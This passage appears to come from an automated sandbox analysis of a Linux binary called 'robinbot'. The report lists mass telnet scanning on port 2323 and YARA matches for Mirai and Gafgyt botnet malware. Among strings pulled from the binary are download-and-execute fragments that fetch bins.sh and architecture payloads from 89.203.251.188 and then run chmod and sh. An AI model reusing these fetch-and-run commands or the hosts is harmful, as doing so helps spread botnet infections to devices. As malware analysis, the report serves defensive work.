              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 14.112.6.22:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 144.156.168.243:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 139.143.139.76:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 61.31.61.166:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 93.6.141.88:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 91.32.109.152:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 64.131.172.234:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 182.100.127.241:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 38.53.169.75:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 89.181.137.217:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 223.13.96.239:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 35.214.167.127:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 213.26.177.67:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 194.192.233.146:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 34.54.140.135:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 5.235.72.161:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 50.58.82.131:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 206.111.251.131:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.161.7.16:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 60.0.124.107:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 120.91.144.249:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 9.230.152.173:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 90.174.220.215:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 50.235.140.85:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 77.90.52.153:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 177.119.63.81:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 111.16.121.190:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 46.182.220.209:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 2.177.66.65:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 201.194.213.163:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 170.29.34.69:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 102.103.170.71:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 215.171.159.186:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 142.20.224.115:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 177.186.127.21:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 119.111.201.100:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 118.214.161.25:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 70.243.213.196:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 117.95.253.203:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 129.124.11.12:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 200.147.114.187:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 162.97.64.220:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 48.247.33.61:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 9.125.31.69:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 157.187.29.122:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 158.4.225.193:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 5.174.242.76:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 189.118.206.169:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 34.45.11.226:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 66.190.222.250:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 194.16.130.68:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 49.208.128.105:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.26.243.37:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 125.129.106.24:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 142.89.106.225:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 29.239.49.207:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 206.54.67.169:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 87.137.17.71:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 26.120.91.80:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 163.206.149.159:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 46.104.71.10:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 219.105.48.142:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 34.74.43.39:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 139.63.207.192:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 165.134.200.35:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 80.35.42.82:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 26.206.51.113:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 115.3.211.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 174.117.4.66:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 69.27.106.198:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 27.196.55.65:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 191.190.101.43:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 7.100.196.77:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 223.235.237.247:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 32.139.196.31:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 116.226.248.24:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 11.138.34.229:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 63.163.210.44:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 57.122.126.26:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 20.28.167.181:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 52.12.222.75:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 80.150.184.88:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 207.235.218.20:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 86.156.83.49:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 119.41.214.13:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 40.131.116.46:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 48.171.171.13:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 176.157.22.236:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 152.225.87.2:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 120.195.196.194:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 174.49.171.110:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 190.25.160.23:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 104.110.14.127:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 197.228.249.212:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 24.16.123.88:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 135.112.229.64:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 91.105.238.87:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 130.77.222.130:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 140.128.233.158:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 182.58.214.177:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 89.199.152.35:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 118.168.107.79:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 18.147.176.235:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 141.170.237.180:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 134.79.8.254:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 189.174.63.104:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 9.26.211.204:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 216.236.152.35:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 219.57.91.27:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 158.71.7.44:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 70.189.69.124:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 222.121.133.154:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 169.104.137.212:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 53.115.10.93:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 19.18.200.189:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 22.82.221.116:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 112.245.168.3:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 29.15.190.218:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 64.200.135.139:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 11.27.196.73:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 203.87.47.198:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 58.153.107.97:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 136.240.123.140:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 78.30.243.129:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 16.95.158.176:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 81.196.45.185:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 114.81.147.16:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 62.40.69.187:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 211.25.222.147:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 17.235.32.35:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 52.112.207.23:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 143.202.57.45:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 70.18.7.113:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 174.5.235.54:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 81.37.108.145:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 146.189.54.185:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 18.63.28.132:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 170.43.196.32:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 196.163.206.25:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 21.208.124.218:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 91.179.136.212:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 12.77.192.43:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 54.118.61.26:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 48.116.238.228:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 65.65.38.8:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 68.231.100.23:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 39.224.101.206:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 35.154.83.136:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 102.43.107.17:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 9.239.156.229:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 115.27.124.239:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 50.114.238.139:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 221.245.168.11:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 16.200.228.146:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 138.208.200.129:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 9.208.140.99:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 164.114.171.149:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 11.221.212.36:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 17.10.184.206:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 155.241.32.20:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 56.111.12.135:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 106.59.169.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 110.226.20.221:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 65.96.72.16:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 191.181.254.114:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 182.200.251.25:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 84.128.2.87:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 221.229.171.143:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 158.140.78.217:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 76.193.60.210:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 75.60.160.62:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 105.128.30.241:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 76.210.130.111:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 87.75.40.107:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 106.124.131.103:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 141.30.188.219:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 136.58.33.40:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 90.172.14.195:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 96.35.244.158:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 82.232.221.168:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 198.200.39.12:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 61.158.28.118:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 138.152.208.119:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 104.226.236.51:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 193.212.118.29:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 84.76.241.115:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 2.34.22.127:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 190.230.108.14:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.93.96.214:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 189.22.133.229:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 84.19.97.169:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 208.64.139.172:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 135.144.71.99:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 215.137.36.132:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 148.121.142.133:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 74.57.187.35:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 219.235.17.12:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 151.53.234.146:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 150.220.127.86:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 92.48.238.199:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 80.170.249.10:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 71.66.123.172:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 149.168.181.31:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 222.188.234.248:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 90.37.39.111:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 90.237.87.170:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 81.249.48.177:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 82.120.87.140:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 219.222.67.84:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 90.135.15.215:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 43.91.72.217:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 162.47.51.40:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 83.143.126.84:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 1.112.185.160:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 145.136.121.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 171.120.78.133:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 168.4.178.199:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 128.195.154.83:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 45.149.70.140:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 173.134.247.203:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 123.219.179.85:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 23.154.216.203:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 117.120.62.159:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 185.222.4.20:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 19.113.215.184:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 14.29.219.125:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 128.186.201.61:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 68.11.105.134:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 91.222.141.174:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 115.106.197.182:2323
              Source: global trafficTCP traffic: 192.168.2.23:64904 -> 52.135.136.123:2323
              Source: /tmp/robinbot (PID: 6226)Socket: 0.0.0.0::23
              Source: /tmp/robinbot (PID: 6226)Socket: 0.0.0.0::0
              Source: /tmp/robinbot (PID: 6226)Socket: 0.0.0.0::80
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
              Source: unknownTCP traffic detected without corresponding DNS query: 163.151.162.85
              Source: unknownTCP traffic detected without corresponding DNS query: 83.190.241.252
              Source: unknownTCP traffic detected without corresponding DNS query: 20.19.233.226
              Source: unknownTCP traffic detected without corresponding DNS query: 45.81.142.31
              Source: unknownTCP traffic detected without corresponding DNS query: 86.8.87.39
              Source: unknownTCP traffic detected without corresponding DNS query: 167.5.212.208
              Source: unknownTCP traffic detected without corresponding DNS query: 82.130.119.117
              Source: unknownTCP traffic detected without corresponding DNS query: 27.153.74.237
              Source: unknownTCP traffic detected without corresponding DNS query: 54.213.36.74
              Source: unknownTCP traffic detected without corresponding DNS query: 88.61.106.82
              Source: unknownTCP traffic detected without corresponding DNS query: 104.142.173.149
              Source: unknownTCP traffic detected without corresponding DNS query: 95.60.53.181
              Source: unknownTCP traffic detected without corresponding DNS query: 17.50.61.226
              Source: unknownTCP traffic detected without corresponding DNS query: 196.140.221.108
              Source: unknownTCP traffic detected without corresponding DNS query: 206.35.61.39
              Source: unknownTCP traffic detected without corresponding DNS query: 180.180.89.207
              Source: unknownTCP traffic detected without corresponding DNS query: 223.167.249.150
              Source: unknownTCP traffic detected without corresponding DNS query: 44.14.123.140
              Source: unknownTCP traffic detected without corresponding DNS query: 202.48.66.143
              Source: unknownTCP traffic detected without corresponding DNS query: 188.159.123.206
              Source: unknownTCP traffic detected without corresponding DNS query: 209.184.177.135
              Source: unknownTCP traffic detected without corresponding DNS query: 46.21.99.14
              Source: unknownTCP traffic detected without corresponding DNS query: 60.220.164.58
              Source: unknownTCP traffic detected without corresponding DNS query: 122.6.32.167
              Source: unknownTCP traffic detected without corresponding DNS query: 147.27.52.221
              Source: unknownTCP traffic detected without corresponding DNS query: 76.245.236.136
              Source: unknownTCP traffic detected without corresponding DNS query: 150.104.214.104
              Source: unknownTCP traffic detected without corresponding DNS query: 160.9.111.142
              Source: unknownTCP traffic detected without corresponding DNS query: 147.71.201.65
              Source: unknownTCP traffic detected without corresponding DNS query: 219.172.207.151
              Source: unknownTCP traffic detected without corresponding DNS query: 137.243.81.5
              Source: unknownTCP traffic detected without corresponding DNS query: 13.96.107.89
              Source: unknownTCP traffic detected without corresponding DNS query: 121.113.44.14
              Source: unknownTCP traffic detected without corresponding DNS query: 213.89.225.108
              Source: unknownTCP traffic detected without corresponding DNS query: 193.185.85.99
              Source: unknownTCP traffic detected without corresponding DNS query: 66.68.113.85
              Source: unknownTCP traffic detected without corresponding DNS query: 11.186.151.230
              Source: unknownTCP traffic detected without corresponding DNS query: 104.103.254.113
              Source: unknownTCP traffic detected without corresponding DNS query: 91.80.118.85
              Source: unknownTCP traffic detected without corresponding DNS query: 194.34.99.79
              Source: unknownTCP traffic detected without corresponding DNS query: 2.206.168.216
              Source: unknownTCP traffic detected without corresponding DNS query: 67.26.77.133
              Source: unknownTCP traffic detected without corresponding DNS query: 95.62.219.106
              Source: unknownTCP traffic detected without corresponding DNS query: 90.208.83.53
              Source: unknownTCP traffic detected without corresponding DNS query: 33.201.138.99
              Source: unknownTCP traffic detected without corresponding DNS query: 188.218.71.100
              Source: unknownTCP traffic detected without corresponding DNS query: 39.27.47.6
              Source: unknownTCP traffic detected without corresponding DNS query: 125.194.52.215
              Source: robinbotString found in binary or memory: http://89.203.251.188/bin.sh;chmod
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;$
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;chmod
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;sh
              Source: robinbotString found in binary or memory: http://89.203.251.188/bins.sh;sh$
              Source: robinbotString found in binary or memory: http://89.203.251.188/mips
              Source: robinbotString found in binary or memory: http://89.203.251.188/mipsel
              Source: robinbotString found in binary or memory: http://purenetworks.com/HNAP1/
              Source: robinbotString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: robinbotString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: robinbot, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
